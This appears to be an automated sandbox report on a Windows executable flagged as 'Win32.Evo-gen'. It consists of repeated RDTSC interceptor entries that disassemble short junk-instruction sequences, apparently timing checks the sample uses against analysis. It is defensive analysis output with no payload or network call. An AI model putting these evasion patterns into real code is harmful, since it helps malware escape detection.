                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DBB second address: D57DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D865C5 second address: D865D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D865D0 second address: D865D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57D94 second address: D57DA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DA3 second address: D57DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8689D second address: D868A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F69 second address: D86F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F7F second address: D86F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F85 second address: D86F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D870F1 second address: D870FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D870FC second address: D87101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8728D second address: D87298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D87852 second address: D8787F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC734E5F77Eh 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC734E5F776h 0x0000001b jmp 00007FC734E5F782h 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C234 second address: D8C239 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C3A3 second address: D8C3EA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC734E5F786h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC734E5F789h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C3EA second address: D8C40C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C40C second address: D8C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C413 second address: D8C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACD6 second address: D8ACDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACDA second address: D8ACE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC734882076h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACE8 second address: D8ACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C4EC second address: D8C4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92C74 second address: D92C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92C7E second address: D92CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 jmp 00007FC73488207Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FC734882076h 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92CB8 second address: D92CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92CBC second address: D92CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC734882080h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9680C second address: D96811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96811 second address: D96816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D968B2 second address: D968B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D968B7 second address: D968E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FC734882082h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96F30 second address: D96F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974AD second address: D974C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC73488207Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974C2 second address: D974D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 xchg eax, ebx 0x00000007 sbb si, 4817h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974D5 second address: D974D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974D9 second address: D974E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D979AD second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D97B35 second address: D97B5F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC734E5F788h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A2C second address: D98A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A32 second address: D98A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and esi, 7130E349h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC734E5F778h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D3A8Ah] 0x00000033 push 00000000h 0x00000035 mov esi, edi 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC734E5F782h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A88 second address: D98A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99AE8 second address: D99AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99AED second address: D99B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734882076h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jl 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f stc 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FC734882078h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jmp 00007FC734882082h 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D3347h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B52 second address: D99B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B58 second address: D99B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Eh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B80 second address: D99B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9A34F second address: D9A353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9B067 second address: D9B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D52D8F second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA08DC second address: DA08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA08F6 second address: DA08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA181C second address: DA1820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9D6AE second address: D9D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA1820 second address: DA182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA2766 second address: DA27CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC734882078h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push esi 0x00000011 je 00007FC734882076h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 nop 0x0000001a xor ebx, 652B1A5Ah 0x00000020 push 00000000h 0x00000022 sub dword ptr [ebp+1244A874h], esi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FC734882078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2CB1h], edx 0x0000004a mov edi, dword ptr [ebp+122D1C75h] 0x00000050 push eax 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC734882081h 0x00000059 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA27CD second address: DA27D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA3736 second address: DA373C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA373C second address: DA3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA5711 second address: DA5715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA4A80 second address: DA4A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA57B9 second address: DA57C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC734882076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE1579 second address: DE1585 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE54CD second address: DE54DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC734882076h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE54DD second address: DE54F1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC734E5F776h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE57E9 second address: DE57EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE5AA8 second address: DE5AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DE5AAC second address: DE5AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FC734882076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA1B1 second address: DEA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC734E5F782h 0x0000000c ja 00007FC734E5F776h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA98B second address: DEA99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Fh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEA99E second address: DEA9B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEAAE9 second address: DEAAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC734882076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEF338 second address: DEF33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEEA63 second address: DEEA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEEA79 second address: DEEA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DEED6D second address: DEED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF55E5 second address: DF55E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58BC second address: DF58D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882082h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58D2 second address: DF58DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF58DA second address: DF58F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC734882081h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF5E30 second address: DF5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC734E5F782h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF668F second address: DF6693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
